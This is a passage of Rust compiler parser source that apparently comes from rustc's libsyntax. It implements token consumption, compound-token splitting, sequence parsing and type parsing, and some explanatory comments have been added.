///
/// Types can also be of the form `IDENT(u8, u8) -> u8`, however this assumes
/// that `IDENT` is not the ident of a fn trait.
fn can_continue_type_after_non_fn_ident(t: &token::Token) -> bool {
t == &token::ModSep || t == &token::Lt ||
t == &token::BinOp(token::Shl)
}
/// Information about the path to a module.
pub struct ModulePath {
name: String,
path_exists: bool,
pub result: Result<ModulePathSuccess, Error>,
}
pub struct ModulePathSuccess {
pub path: PathBuf,
pub directory_ownership: DirectoryOwnership,
warn: bool,
}
#[derive(Debug)]
enum LhsExpr {
NotYetParsed,
AttributesParsed(ThinVec<Attribute>),
AlreadyParsed(P<Expr>),
}
impl From<Option<ThinVec<Attribute>>> for LhsExpr {
fn from(o: Option<ThinVec<Attribute>>) -> Self {
if let Some(attrs) = o {
LhsExpr::AttributesParsed(attrs)
} else {
LhsExpr::NotYetParsed
}
}
}
impl From<P<Expr>> for LhsExpr {
fn from(expr: P<Expr>) -> Self {
LhsExpr::AlreadyParsed(expr)
}
}
#[derive(Copy, Clone, Debug)]
crate enum TokenExpectType {
Expect,
NoExpect,
}
impl<'a> Parser<'a> {
pub fn new(
sess: &'a ParseSess,
tokens: TokenStream,
directory: Option<Directory<'a>>,
recurse_into_file_modules: bool,
desugar_doc_comments: bool,
subparser_name: Option<&'static str>,
) -> Self {
let mut parser = Parser {
sess,
token: token::Whitespace,
span: DUMMY_SP,
prev_span: DUMMY_SP,
meta_var_span: None,
prev_token_kind: PrevTokenKind::Other,
restrictions: Restrictions::empty(),
recurse_into_file_modules,
directory: Directory {
path: Cow::from(PathBuf::new()),
ownership: DirectoryOwnership::Owned { relative: None }
},
root_module_name: None,
expected_tokens: Vec::new(),
token_cursor: TokenCursor {
frame: TokenCursorFrame::new(
DelimSpan::dummy(),
token::NoDelim,
&tokens.into(),
),
stack: Vec::new(),
},
desugar_doc_comments,
cfg_mods: true,
unmatched_angle_bracket_count: 0,
max_angle_bracket_count: 0,
unclosed_delims: Vec::new(),
last_unexpected_token_span: None,
subparser_name,
};
let tok = parser.next_tok();
parser.token = tok.tok;
parser.span = tok.sp;
if let Some(directory) = directory {
parser.directory = directory;
} else if !parser.span.is_dummy() {
if let FileName::Real(mut path) = sess.source_map().span_to_unmapped_path(parser.span) {
path.pop();
parser.directory.path = Cow::from(path);
}
}
parser.process_potential_macro_variable();
parser
}
fn next_tok(&mut self) -> TokenAndSpan {
let mut next = if self.desugar_doc_comments {
self.token_cursor.next_desugared()
} else {
self.token_cursor.next()
};
if next.sp.is_dummy() {
// Tweak the location for better diagnostics, but keep syntactic context intact.
next.sp = self.prev_span.with_ctxt(next.sp.ctxt());
}
next
}
/// Converts the current token to a string using `self`'s reader.
pub fn this_token_to_string(&self) -> String {
pprust::token_to_string(&self.token)
}
crate fn token_descr(&self) -> Option<&'static str> {
Some(match &self.token {
t if t.is_special_ident() => "reserved identifier",
t if t.is_used_keyword() => "keyword",
t if t.is_unused_keyword() => "reserved keyword",
token::DocComment(..) => "doc comment",
_ => return None,
})
}
crate fn this_token_descr(&self) -> String {
if let Some(prefix) = self.token_descr() {
format!("{} `{}`", prefix, self.this_token_to_string())
} else {
format!("`{}`", self.this_token_to_string())
}
}
crate fn unexpected<T>(&mut self) -> PResult<'a, T> {
match self.expect_one_of(&[], &[]) {
Err(e) => Err(e),
Ok(_) => unreachable!(),
}
}
/// Expects and consumes the token `t`. Signals an error if the next token is not `t`.
pub fn expect(&mut self, t: &token::Token) -> PResult<'a, bool /* recovered */> {
if self.expected_tokens.is_empty() {
if self.token == *t {
self.bump();
Ok(false)
} else {
self.unexpected_try_recover(t)
}
} else {
self.expect_one_of(slice::from_ref(t), &[])
}
}
/// Expects the next token to be an edible or inedible token. If edible,
/// consumes it; if inedible, returns without consuming
/// anything. Signals a fatal error if the next token is unexpected.
pub fn expect_one_of(
&mut self,
edible: &[token::Token],
inedible: &[token::Token],
) -> PResult<'a, bool /* recovered */> {
if edible.contains(&self.token) {
self.bump();
Ok(false)
} else if inedible.contains(&self.token) {
// leave it in the input
Ok(false)
} else if self.last_unexpected_token_span == Some(self.span) {
FatalError.raise();
} else {
self.expected_one_of_not_found(edible, inedible)
}
}
/// Returns the span of the given expression if it was not interpolated, or the span of the interpolated token.
fn interpolated_or_expr_span(
&self,
expr: PResult<'a, P<Expr>>,
) -> PResult<'a, (Span, P<Expr>)> {
expr.map(|e| {
if self.prev_token_kind == PrevTokenKind::Interpolated {
(self.prev_span, e)
} else {
(e.span, e)
}
})
}
pub fn parse_ident(&mut self) -> PResult<'a, ast::Ident> {
self.parse_ident_common(true)
}
fn parse_ident_common(&mut self, recover: bool) -> PResult<'a, ast::Ident> {
match self.token {
token::Ident(ident, _) => {
if self.token.is_reserved_ident() {
let mut err = self.expected_ident_found();
if recover {
err.emit();
} else {
return Err(err);
}
}
let span = self.span;
self.bump();
Ok(Ident::new(ident.name, span))
}
_ => {
Err(if self.prev_token_kind == PrevTokenKind::DocComment {
self.span_fatal_err(self.prev_span, Error::UselessDocComment)
} else {
self.expected_ident_found()
})
}
}
}
/// Checks if the next token is `tok`, and returns `true` if so.
///
/// This method will automatically add `tok` to `expected_tokens` if `tok` is not
/// encountered.
crate fn check(&mut self, tok: &token::Token) -> bool {
let is_present = self.token == *tok;
if !is_present { self.expected_tokens.push(TokenType::Token(tok.clone())); }
is_present
}
/// Consumes the token `tok` if it is the current token. Returns whether the given token was present.
pub fn eat(&mut self, tok: &token::Token) -> bool {
let is_present = self.check(tok);
if is_present { self.bump() }
is_present
}
fn check_keyword(&mut self, kw: Symbol) -> bool {
self.expected_tokens.push(TokenType::Keyword(kw));
self.token.is_keyword(kw)
}
/// If the next token is the given keyword, eats it and returns
/// `true`. Otherwise, returns `false`.
pub fn eat_keyword(&mut self, kw: Symbol) -> bool {
if self.check_keyword(kw) {
self.bump();
true
} else {
false
}
}
fn eat_keyword_noexpect(&mut self, kw: Symbol) -> bool {
if self.token.is_keyword(kw) {
self.bump();
true
} else {
false
}
}
/// If the given word is not a keyword, signals an error.
/// If the next token is not the given word, signals an error.
/// Otherwise, eats it.
fn expect_keyword(&mut self, kw: Symbol) -> PResult<'a, ()> {
if !self.eat_keyword(kw) {
self.unexpected()
} else {
Ok(())
}
}
crate fn check_ident(&mut self) -> bool {
if self.token.is_ident() {
true
} else {
self.expected_tokens.push(TokenType::Ident);
false
}
}
fn check_path(&mut self) -> bool {
if self.token.is_path_start() {
true
} else {
self.expected_tokens.push(TokenType::Path);
false
}
}
fn check_type(&mut self) -> bool {
if self.token.can_begin_type() {
true
} else {
self.expected_tokens.push(TokenType::Type);
false
}
}
fn check_const_arg(&mut self) -> bool {
if self.token.can_begin_const_arg() {
true
} else {
self.expected_tokens.push(TokenType::Const);
false
}
}
/// Expects and consumes a `+`. If `+=` is seen, replaces it with an `=`
/// and continues. If a `+` is not seen, returns `false`.
///
/// This is used when token-splitting `+=` into `+`.
/// See issue #47856 for an example of when this may occur.
fn eat_plus(&mut self) -> bool {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::Plus)));
match self.token {
token::BinOp(token::Plus) => {
self.bump();
true
}
token::BinOpEq(token::Plus) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
self.bump_with(token::Eq, span);
true
}
_ => false,
}
}
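// Illustrative note (not from the original source): `eat_plus` consumes only
// the `+` half of a `+=` token and leaves an `=` whose span starts one byte
// later, so a bound list written as `A+=...` keeps parsing as if it were
// `A + =...`. `parse_remaining_bounds` below relies on this splitting.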
/// Checks whether the next token is either `+` or `+=`,
/// returning `false` otherwise.
fn check_plus(&mut self) -> bool {
if self.token.is_like_plus() {
true
}
else {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::Plus)));
false
}
}
/// Expects and consumes an `&`. If `&&` is seen, replaces it with a single
/// `&` and continues. If an `&` is not seen, signals an error.
fn expect_and(&mut self) -> PResult<'a, ()> {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::And)));
match self.token {
token::BinOp(token::And) => {
self.bump();
Ok(())
}
token::AndAnd => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Ok(self.bump_with(token::BinOp(token::And), span))
}
_ => self.unexpected()
}
}
/// Expects and consumes an `|`. If `||` is seen, replaces it with a single
/// `|` and continues. If an `|` is not seen, signals an error.
fn expect_or(&mut self) -> PResult<'a, ()> {
self.expected_tokens.push(TokenType::Token(token::BinOp(token::Or)));
match self.token {
token::BinOp(token::Or) => {
self.bump();
Ok(())
}
token::OrOr => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Ok(self.bump_with(token::BinOp(token::Or), span))
}
_ => self.unexpected()
}
}
fn expect_no_suffix(&self, sp: Span, kind: &str, suffix: Option<ast::Name>) {
literal::expect_no_suffix(&self.sess.span_diagnostic, sp, kind, suffix)
}
/// Attempts to consume a `<`. If `<<` is seen, replaces it with a single
/// `<` and continues. If `<-` is seen, consumes the `<` and leaves a `-`
/// in its place. If a `<` is not seen, returns `false`.
///
/// This is meant to be used when parsing generics on a path to get the
/// starting token.
fn eat_lt(&mut self) -> bool {
self.expected_tokens.push(TokenType::Token(token::Lt));
let ate = match self.token {
token::Lt => {
self.bump();
true
}
token::BinOp(token::Shl) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
self.bump_with(token::Lt, span);
true
}
token::LArrow => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
self.bump_with(token::BinOp(token::Minus), span);
true
}
_ => false,
};
if ate {
// See doc comment for `unmatched_angle_bracket_count`.
self.unmatched_angle_bracket_count += 1;
self.max_angle_bracket_count += 1;
debug!("eat_lt: (increment) count={:?}", self.unmatched_angle_bracket_count);
}
ate
}
fn expect_lt(&mut self) -> PResult<'a, ()> {
if !self.eat_lt() {
self.unexpected()
} else {
Ok(())
}
}
/// Expects and consumes a single `>` token. If a `>>` is seen, replaces it
/// with a single `>` and continues. If a `>` is not seen, signals an error.
fn expect_gt(&mut self) -> PResult<'a, ()> {
self.expected_tokens.push(TokenType::Token(token::Gt));
let ate = match self.token {
token::Gt => {
self.bump();
Some(())
}
token::BinOp(token::Shr) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Some(self.bump_with(token::Gt, span))
}
token::BinOpEq(token::Shr) => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Some(self.bump_with(token::Ge, span))
}
token::Ge => {
let span = self.span.with_lo(self.span.lo() + BytePos(1));
Some(self.bump_with(token::Eq, span))
}
_ => None,
};
match ate {
Some(_) => {
// See doc comment for `unmatched_angle_bracket_count`.
if self.unmatched_angle_bracket_count > 0 {
self.unmatched_angle_bracket_count -= 1;
debug!("expect_gt: (decrement) count={:?}", self.unmatched_angle_bracket_count);
}
Ok(())
},
None => self.unexpected(),
}
}
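// Illustrative example (not from the original source): why `expect_gt`
// splits tokens. In `Vec<Vec<u8>>` the lexer produces a single `>>`
// (`BinOp(Shr)`) for the two closing brackets; the inner argument list's
// `expect_gt` consumes just the first `>` by swapping in a `Gt` token whose
// span starts one byte later, and the outer list then closes on the
// remaining `>`. Likewise `>>=` is split into `>` + `>=`, and `>=` into
// `>` + `=`.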
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
pub fn parse_seq_to_end<T, F>(&mut self,
ket: &token::Token,
sep: SeqSep,
f: F)
-> PResult<'a, Vec<T>> where
F: FnMut(&mut Parser<'a>) -> PResult<'a, T>,
{
let (val, recovered) = self.parse_seq_to_before_end(ket, sep, f)?;
if !recovered {
self.bump();
}
Ok(val)
}
/// Parses a sequence, not including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
pub fn parse_seq_to_before_end<T, F>(
&mut self,
ket: &token::Token,
sep: SeqSep,
f: F,
) -> PResult<'a, (Vec<T>, bool)>
where F: FnMut(&mut Parser<'a>) -> PResult<'a, T>
{
self.parse_seq_to_before_tokens(&[ket], sep, TokenExpectType::Expect, f)
}
crate fn parse_seq_to_before_tokens<T, F>(
&mut self,
kets: &[&token::Token],
sep: SeqSep,
expect: TokenExpectType,
mut f: F,
) -> PResult<'a, (Vec<T>, bool /* recovered */)>
where F: FnMut(&mut Parser<'a>) -> PResult<'a, T>
{
let mut first = true;
let mut recovered = false;
let mut v = vec![];
while !kets.iter().any(|k| {
    match expect {
        TokenExpectType::Expect => self.check(k),
        TokenExpectType::NoExpect => self.token == **k,
    }
}) {
match self.token {
token::CloseDelim(..) | token::Eof => break,
_ => {}
};
if let Some(ref t) = sep.sep {
if first {
first = false;
} else {
match self.expect(t) {
Ok(false) => {}
Ok(true) => {
recovered = true;
break;
}
Err(mut e) => {
// Attempt to keep parsing if it was a similar separator
if let Some(ref tokens) = t.similar_tokens() {
if tokens.contains(&self.token) {
self.bump();
}
}
e.emit();
// Attempt to keep parsing if it was an omitted separator
match f(self) {
Ok(t) => {
v.push(t);
continue;
},
Err(mut e) => {
e.cancel();
break;
}
}
}
}
}
}
if sep.trailing_sep_allowed && kets.iter().any(|k| {
match expect {
TokenExpectType::Expect => self.check(k),
TokenExpectType::NoExpect => self.token == **k,
}
}) {
break;
}
let t = f(self)?;
v.push(t);
}
Ok((v, recovered))
}
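// Illustrative sketch (not from the original source): a typical call site.
// Parsing the comma-separated type list of a parenthesized path segment such
// as `Fn(u8, u16)` (see `parse_path_segment` below) amounts to:
//
//     let (inputs, recovered) = self.parse_seq_to_before_tokens(
//         &[&token::CloseDelim(token::Paren)],    // stop before `)`
//         SeqSep::trailing_allowed(token::Comma), // `,`-separated, trailing ok
//         TokenExpectType::Expect,
//         |p| p.parse_ty(),
//     )?;
//
// The closure parses one element; the loop above handles separators and
// recovers from omitted or similar-looking ones.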
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_unspanned_seq<T, F>(
&mut self,
bra: &token::Token,
ket: &token::Token,
sep: SeqSep,
f: F,
) -> PResult<'a, Vec<T>> where
F: FnMut(&mut Parser<'a>) -> PResult<'a, T>,
{
self.expect(bra)?;
let (result, recovered) = self.parse_seq_to_before_end(ket, sep, f)?;
if !recovered {
self.eat(ket);
}
Ok(result)
}
/// Advances the parser by one token.
pub fn bump(&mut self) {
if self.prev_token_kind == PrevTokenKind::Eof {
// Bumping after EOF is a bad sign, usually an infinite loop.
self.bug("attempted to bump the parser past EOF (may be stuck in a loop)");
}
self.prev_span = self.meta_var_span.take().unwrap_or(self.span);
// Record last token kind for possible error recovery.
self.prev_token_kind = match self.token {
token::DocComment(..) => PrevTokenKind::DocComment,
token::Comma => PrevTokenKind::Comma,
token::BinOp(token::Plus) => PrevTokenKind::Plus,
token::BinOp(token::Or) => PrevTokenKind::BitOr,
token::Interpolated(..) => PrevTokenKind::Interpolated,
token::Eof => PrevTokenKind::Eof,
token::Ident(..) => PrevTokenKind::Ident,
_ => PrevTokenKind::Other,
};
let next = self.next_tok();
self.span = next.sp;
self.token = next.tok;
self.expected_tokens.clear();
// check after each token
self.process_potential_macro_variable();
}
/// Advances the parser using the provided token as the next one. Use this
/// when consuming part of a token, e.g. a single `<` from `<<`.
fn bump_with(&mut self, next: token::Token, span: Span) {
self.prev_span = self.span.with_hi(span.lo());
// It would be incorrect to record the kind of the current token, but
// fortunately for tokens currently using `bump_with`, the
// prev_token_kind will be of no use anyway.
self.prev_token_kind = PrevTokenKind::Other;
self.span = span;
self.token = next;
self.expected_tokens.clear();
}
pub fn look_ahead<R, F>(&self, dist: usize, f: F) -> R where
F: FnOnce(&token::Token) -> R,
{
if dist == 0 {
return f(&self.token)
}
f(&match self.token_cursor.frame.tree_cursor.look_ahead(dist - 1) {
Some(tree) => match tree {
TokenTree::Token(_, tok) => tok,
TokenTree::Delimited(_, delim, _) => token::OpenDelim(delim),
},
None => token::CloseDelim(self.token_cursor.frame.delim),
})
}
crate fn look_ahead_span(&self, dist: usize) -> Span {
if dist == 0 {
return self.span
}
match self.token_cursor.frame.tree_cursor.look_ahead(dist - 1) {
Some(TokenTree::Token(span, _)) => span,
Some(TokenTree::Delimited(span, ..)) => span.entire(),
None => self.look_ahead_span(dist - 1),
}
}
/// Returns whether any of the given keywords are `dist` tokens ahead of the current one.
fn is_keyword_ahead(&self, dist: usize, kws: &[Symbol]) -> bool {
self.look_ahead(dist, |t| kws.iter().any(|&kw| t.is_keyword(kw)))
}
/// Is the current token one of the keywords that signals a bare function type?
fn token_is_bare_fn_keyword(&mut self) -> bool {
self.check_keyword(kw::Fn) ||
self.check_keyword(kw::Unsafe) ||
self.check_keyword(kw::Extern)
}
/// Parses a `TyKind::BareFn` type.
fn parse_ty_bare_fn(&mut self, generic_params: Vec<GenericParam>) -> PResult<'a, TyKind> {
/*
[unsafe] [extern "ABI"] fn (S) -> T
^~~~^ ^~~~^ ^~^ ^
| | | |
| | | Return type
| | Argument types
| |
| ABI
Function Style
*/
let unsafety = self.parse_unsafety();
let abi = if self.eat_keyword(kw::Extern) {
self.parse_opt_abi()?.unwrap_or(Abi::C)
} else {
Abi::Rust
};
self.expect_keyword(kw::Fn)?;
let (inputs, c_variadic) = self.parse_fn_args(false, true)?;
let ret_ty = self.parse_ret_ty(false)?;
let decl = P(FnDecl {
inputs,
output: ret_ty,
c_variadic,
});
Ok(TyKind::BareFn(P(BareFnTy {
abi,
unsafety,
generic_params,
decl,
})))
}
/// Parses asyncness: `async` or nothing.
fn parse_asyncness(&mut self) -> IsAsync {
if self.eat_keyword(kw::Async) {
IsAsync::Async {
closure_id: ast::DUMMY_NODE_ID,
return_impl_trait_id: ast::DUMMY_NODE_ID,
}
} else {
IsAsync::NotAsync
}
}
/// Parses unsafety: `unsafe` or nothing.
fn parse_unsafety(&mut self) -> Unsafety {
if self.eat_keyword(kw::Unsafe) {
Unsafety::Unsafe
} else {
Unsafety::Normal
}
}
/// Parses the items in a trait declaration.
pub fn parse_trait_item(&mut self, at_end: &mut bool) -> PResult<'a, TraitItem> {
maybe_whole!(self, NtTraitItem, |x| x);
let attrs = self.parse_outer_attributes()?;
let mut unclosed_delims = vec![];
let (mut item, tokens) = self.collect_tokens(|this| {
let item = this.parse_trait_item_(at_end, attrs);
unclosed_delims.append(&mut this.unclosed_delims);
item
})?;
self.unclosed_delims.append(&mut unclosed_delims);
// See `parse_item` for why this clause is here.
if !item.attrs.iter().any(|attr| attr.style == AttrStyle::Inner) {
item.tokens = Some(tokens);
}
Ok(item)
}
fn parse_trait_item_(&mut self,
at_end: &mut bool,
mut attrs: Vec<Attribute>) -> PResult<'a, TraitItem> {
let lo = self.span;
self.eat_bad_pub();
let (name, node, generics) = if self.eat_keyword(kw::Type) {
self.parse_trait_item_assoc_ty()?
} else if self.is_const_item() {
self.expect_keyword(kw::Const)?;
let ident = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
let default = if self.eat(&token::Eq) {
let expr = self.parse_expr()?;
self.expect(&token::Semi)?;
Some(expr)
} else {
self.expect(&token::Semi)?;
None
};
(ident, TraitItemKind::Const(ty, default), ast::Generics::default())
} else if let Some(mac) = self.parse_assoc_macro_invoc("trait", None, &mut false)? {
// trait item macro.
(Ident::invalid(), ast::TraitItemKind::Macro(mac), ast::Generics::default())
} else {
let (constness, unsafety, asyncness, abi) = self.parse_fn_front_matter()?;
let ident = self.parse_ident()?;
let mut generics = self.parse_generics()?;
let decl = self.parse_fn_decl_with_self(|p: &mut Parser<'a>| {
// This is somewhat dubious; we don't want to allow
// argument names to be left off if there is a
// definition...
// We don't allow argument names to be left off in edition 2018.
p.parse_arg_general(p.span.rust_2018(), true, false)
})?;
generics.where_clause = self.parse_where_clause()?;
let sig = ast::MethodSig {
header: FnHeader {
unsafety,
constness,
abi,
asyncness,
},
decl,
};
let body = match self.token {
token::Semi => {
self.bump();
*at_end = true;
debug!("parse_trait_methods(): parsing required method");
None
}
token::OpenDelim(token::Brace) => {
debug!("parse_trait_methods(): parsing provided method");
*at_end = true;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(inner_attrs.iter().cloned());
Some(body)
}
token::Interpolated(ref nt) => {
match **nt {
token::NtBlock(..) => {
*at_end = true;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(inner_attrs.iter().cloned());
Some(body)
}
_ => {
return self.expected_semi_or_open_brace();
}
}
}
_ => {
return self.expected_semi_or_open_brace();
}
};
(ident, ast::TraitItemKind::Method(sig, body), generics)
};
Ok(TraitItem {
id: ast::DUMMY_NODE_ID,
ident: name,
attrs,
generics,
node,
span: lo.to(self.prev_span),
tokens: None,
})
}
/// Parses an optional return type `[ -> TY ]` in a function declaration.
fn parse_ret_ty(&mut self, allow_plus: bool) -> PResult<'a, FunctionRetTy> {
if self.eat(&token::RArrow) {
Ok(FunctionRetTy::Ty(self.parse_ty_common(allow_plus, true, false)?))
} else {
Ok(FunctionRetTy::Default(self.span.shrink_to_lo()))
}
}
/// Parses a type.
pub fn parse_ty(&mut self) -> PResult<'a, P<Ty>> {
self.parse_ty_common(true, true, false)
}
/// Parses a type in restricted contexts where `+` is not permitted.
///
/// Example 1: `&'a TYPE`
/// `+` is prohibited to maintain operator priority (P(+) < P(&)).
/// Example 2: `value1 as TYPE + value2`
/// `+` is prohibited to avoid interactions with expression grammar.
fn parse_ty_no_plus(&mut self) -> PResult<'a, P<Ty>> {
self.parse_ty_common(false, true, false)
}
fn parse_ty_common(&mut self, allow_plus: bool, allow_qpath_recovery: bool,
allow_c_variadic: bool) -> PResult<'a, P<Ty>> {
maybe_recover_from_interpolated_ty_qpath!(self, allow_qpath_recovery);
maybe_whole!(self, NtTy, |x| x);
let lo = self.span;
let mut impl_dyn_multi = false;
let node = if self.eat(&token::OpenDelim(token::Paren)) {
// `(TYPE)` is a parenthesized type.
// `(TYPE,)` is a tuple with a single field of type TYPE.
let mut ts = vec![];
let mut last_comma = false;
while self.token != token::CloseDelim(token::Paren) {
ts.push(self.parse_ty()?);
if self.eat(&token::Comma) {
last_comma = true;
} else {
last_comma = false;
break;
}
}
let trailing_plus = self.prev_token_kind == PrevTokenKind::Plus;
self.expect(&token::CloseDelim(token::Paren))?;
if ts.len() == 1 && !last_comma {
let ty = ts.into_iter().nth(0).unwrap().into_inner();
let maybe_bounds = allow_plus && self.token.is_like_plus();
match ty.node {
// `(TY_BOUND_NOPAREN) + BOUND + ...`.
TyKind::Path(None, ref path) if maybe_bounds => {
self.parse_remaining_bounds(Vec::new(), path.clone(), lo, true)?
}
TyKind::TraitObject(ref bounds, TraitObjectSyntax::None)
if maybe_bounds && bounds.len() == 1 && !trailing_plus => {
let path = match bounds[0] {
GenericBound::Trait(ref pt, ..) => pt.trait_ref.path.clone(),
GenericBound::Outlives(..) => self.bug("unexpected lifetime bound"),
};
self.parse_remaining_bounds(Vec::new(), path, lo, true)?
}
// `(TYPE)`
_ => TyKind::Paren(P(ty))
}
} else {
TyKind::Tup(ts)
}
} else if self.eat(&token::Not) {
// Never type `!`
TyKind::Never
} else if self.eat(&token::BinOp(token::Star)) {
// Raw pointer
TyKind::Ptr(self.parse_ptr()?)
} else if self.eat(&token::OpenDelim(token::Bracket)) {
// Array or slice
let t = self.parse_ty()?;
// Parse optional `; EXPR` in `[TYPE; EXPR]`
let t = match self.maybe_parse_fixed_length_of_vec()? {
None => TyKind::Slice(t),
Some(length) => TyKind::Array(t, AnonConst {
id: ast::DUMMY_NODE_ID,
value: length,
}),
};
self.expect(&token::CloseDelim(token::Bracket))?;
t
} else if self.check(&token::BinOp(token::And)) || self.check(&token::AndAnd) {
// Reference
self.expect_and()?;
self.parse_borrowed_pointee()?
} else if self.eat_keyword_noexpect(kw::Typeof) {
// `typeof(EXPR)`
// In order to not be ambiguous, the type must be surrounded by parens.
self.expect(&token::OpenDelim(token::Paren))?;
let e = AnonConst {
id: ast::DUMMY_NODE_ID,
value: self.parse_expr()?,
};
self.expect(&token::CloseDelim(token::Paren))?;
TyKind::Typeof(e)
} else if self.eat_keyword(kw::Underscore) {
// A type to be inferred `_`
TyKind::Infer
} else if self.token_is_bare_fn_keyword() {
// Function pointer type
self.parse_ty_bare_fn(Vec::new())?
} else if self.check_keyword(kw::For) {
// Function pointer type or bound list (trait object type) starting with a poly-trait.
// `for<'lt> [unsafe] [extern "ABI"] fn (&'lt S) -> T`
// `for<'lt> Trait1<'lt> + Trait2 + 'a`
let lo = self.span;
let lifetime_defs = self.parse_late_bound_lifetime_defs()?;
if self.token_is_bare_fn_keyword() {
self.parse_ty_bare_fn(lifetime_defs)?
} else {
let path = self.parse_path(PathStyle::Type)?;
let parse_plus = allow_plus && self.check_plus();
self.parse_remaining_bounds(lifetime_defs, path, lo, parse_plus)?
}
} else if self.eat_keyword(kw::Impl) {
// Always parse bounds greedily for better error recovery.
let bounds = self.parse_generic_bounds(None)?;
impl_dyn_multi = bounds.len() > 1 || self.prev_token_kind == PrevTokenKind::Plus;
TyKind::ImplTrait(ast::DUMMY_NODE_ID, bounds)
} else if self.check_keyword(kw::Dyn) &&
(self.span.rust_2018() ||
self.look_ahead(1, |t| t.can_begin_bound() &&
!can_continue_type_after_non_fn_ident(t))) {
self.bump(); // `dyn`
// Always parse bounds greedily for better error recovery.
let bounds = self.parse_generic_bounds(None)?;
impl_dyn_multi = bounds.len() > 1 || self.prev_token_kind == PrevTokenKind::Plus;
TyKind::TraitObject(bounds, TraitObjectSyntax::Dyn)
} else if self.check(&token::Question) ||
self.check_lifetime() && self.look_ahead(1, |t| t.is_like_plus()) {
// Bound list (trait object type)
TyKind::TraitObject(self.parse_generic_bounds_common(allow_plus, None)?,
TraitObjectSyntax::None)
} else if self.eat_lt() {
// Qualified path
let (qself, path) = self.parse_qpath(PathStyle::Type)?;
TyKind::Path(Some(qself), path)
} else if self.token.is_path_start() {
// Simple path
let path = self.parse_path(PathStyle::Type)?;
if self.eat(&token::Not) {
// Macro invocation in type position
let (delim, tts) = self.expect_delimited_token_tree()?;
let node = Mac_ { path, tts, delim };
TyKind::Mac(respan(lo.to(self.prev_span), node))
} else {
// Just a type path or bound list (trait object type) starting with a trait.
// `Type`
// `Trait1 + Trait2 + 'a`
if allow_plus && self.check_plus() {
self.parse_remaining_bounds(Vec::new(), path, lo, true)?
} else {
TyKind::Path(None, path)
}
}
} else if self.check(&token::DotDotDot) {
if allow_c_variadic {
self.eat(&token::DotDotDot);
TyKind::CVarArgs
} else {
return Err(self.fatal(
"only foreign functions are allowed to be C-variadic"
));
}
} else {
let msg = format!("expected type, found {}", self.this_token_descr());
return Err(self.fatal(&msg));
};
let span = lo.to(self.prev_span);
let ty = P(Ty { node, span, id: ast::DUMMY_NODE_ID });
// Try to recover from use of `+` with incorrect priority.
self.maybe_report_ambiguous_plus(allow_plus, impl_dyn_multi, &ty);
self.maybe_recover_from_bad_type_plus(allow_plus, &ty)?;
self.maybe_recover_from_bad_qpath(ty, allow_qpath_recovery)
}
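// Illustrative summary (not from the original source): how surface syntax
// maps onto the `TyKind` variants produced above.
//
//     (u8)               -> TyKind::Paren
//     (u8, u16)          -> TyKind::Tup
//     !                  -> TyKind::Never
//     *const T / *mut T  -> TyKind::Ptr
//     [T] / [T; 4]       -> TyKind::Slice / TyKind::Array
//     &'a mut T          -> TyKind::Rptr
//     _                  -> TyKind::Infer
//     impl Trait + Send  -> TyKind::ImplTrait
//     dyn Trait + Send   -> TyKind::TraitObject (TraitObjectSyntax::Dyn)
//     <T as U>::Assoc    -> TyKind::Path with a `QSelf`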
fn parse_remaining_bounds(&mut self, generic_params: Vec<GenericParam>, path: ast::Path,
lo: Span, parse_plus: bool) -> PResult<'a, TyKind> {
let poly_trait_ref = PolyTraitRef::new(generic_params, path, lo.to(self.prev_span));
let mut bounds = vec![GenericBound::Trait(poly_trait_ref, TraitBoundModifier::None)];
if parse_plus {
self.eat_plus(); // `+`, or `+=` gets split and `+` is discarded
bounds.append(&mut self.parse_generic_bounds(Some(self.prev_span))?);
}
Ok(TyKind::TraitObject(bounds, TraitObjectSyntax::None))
}
fn parse_borrowed_pointee(&mut self) -> PResult<'a, TyKind> {
let opt_lifetime = if self.check_lifetime() { Some(self.expect_lifetime()) } else { None };
let mutbl = self.parse_mutability();
let ty = self.parse_ty_no_plus()?;
return Ok(TyKind::Rptr(opt_lifetime, MutTy { ty: ty, mutbl: mutbl }));
}
fn parse_ptr(&mut self) -> PResult<'a, MutTy> {
let mutbl = if self.eat_keyword(kw::Mut) {
Mutability::Mutable
} else if self.eat_keyword(kw::Const) {
Mutability::Immutable
} else {
let span = self.prev_span;
let msg = "expected mut or const in raw pointer type";
self.struct_span_err(span, msg)
.span_label(span, msg)
.help("use `*mut T` or `*const T` as appropriate")
.emit();
Mutability::Immutable
};
let t = self.parse_ty_no_plus()?;
Ok(MutTy { ty: t, mutbl: mutbl })
}
fn is_named_argument(&self) -> bool {
let offset = match self.token {
token::Interpolated(ref nt) => match **nt {
token::NtPat(..) => return self.look_ahead(1, |t| t == &token::Colon),
_ => 0,
}
token::BinOp(token::And) | token::AndAnd => 1,
_ if self.token.is_keyword(kw::Mut) => 1,
_ => 0,
};
self.look_ahead(offset, |t| t.is_ident()) &&
self.look_ahead(offset + 1, |t| t == &token::Colon)
}
/// Skips unexpected attributes and doc comments in this position and emits an appropriate
/// error.
/// This version of `parse_arg` doesn't necessarily require identifier names.
fn parse_arg_general(
&mut self,
require_name: bool,
is_trait_item: bool,
allow_c_variadic: bool,
) -> PResult<'a, Arg> {
if let Ok(Some(arg)) = self.parse_self_arg() {
return self.recover_bad_self_arg(arg, is_trait_item);
}
let (pat, ty) = if require_name || self.is_named_argument() {
debug!("parse_arg_general parse_pat (require_name:{})", require_name);
self.eat_incorrect_doc_comment("method arguments");
let pat = self.parse_pat(Some("argument name"))?;
if let Err(mut err) = self.expect(&token::Colon) {
if let Some(ident) = self.argument_without_type(
